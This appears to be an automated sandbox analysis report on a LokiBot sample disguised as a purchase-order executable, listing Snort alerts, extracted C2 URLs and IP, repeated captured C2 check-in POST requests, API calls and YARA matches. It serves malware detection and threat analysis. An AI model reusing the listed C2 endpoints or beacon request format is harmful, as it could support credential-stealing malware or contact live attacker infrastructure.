              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49864 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49864 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49864 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49864 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49871 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49871 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49871 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49871 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49873 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49873 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49873 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49873 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49875 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49875 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49875 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49875 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49876 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49876 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49876 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49876 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49877 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49877 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49877 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49877 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49879 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49879 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49879 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49879 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49882 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49882 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49882 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49882 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49883 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49883 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49883 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49883 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49884 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49884 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49884 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49884 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49885 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49885 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49885 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49885 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49886 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49886 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49886 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49886 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49887 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49887 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49887 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49887 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49888 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49888 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49888 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49888 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49889 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49889 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49889 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49889 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49890 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49890 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49890 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49890 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49891 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49891 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49891 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49891 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49892 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49892 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49892 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49892 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49893 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49893 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49893 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49893 -> 104.223.93.105:80
              C2 URLs / IPs found in malware configurationShow sources
              Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
              Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
              Source: Joe Sandbox ViewIP Address: 104.223.93.105 104.223.93.105
              Source: Joe Sandbox ViewIP Address: 104.223.93.105 104.223.93.105
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 190Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 190Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 06:15:13 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 06:15:14 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: Purchase Order #5000012803.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
              Source: Purchase Order #5000012803.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: Purchase Order #5000012803.exe, Purchase Order #5000012803.exe, 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, Purchase Order #5000012803.exe, 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.com/
              Source: unknownHTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AF753E12Content-Length: 190Connection: close
              Source: unknownDNS traffic detected: queries for: slimpackage.com
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 1_2_00404ED4 recv,1_2_00404ED4
              Source: Purchase Order #5000012803.exe, 00000000.00000002.668485739.00000000007BA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404F61

              System Summary:

              barindex
              Malicious sample detected (through community Yara rule)Show sources
              Source: 1.0.Purchase Order #5000012803.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.0.Purchase Order #5000012803.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.0.Purchase Order #5000012803.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
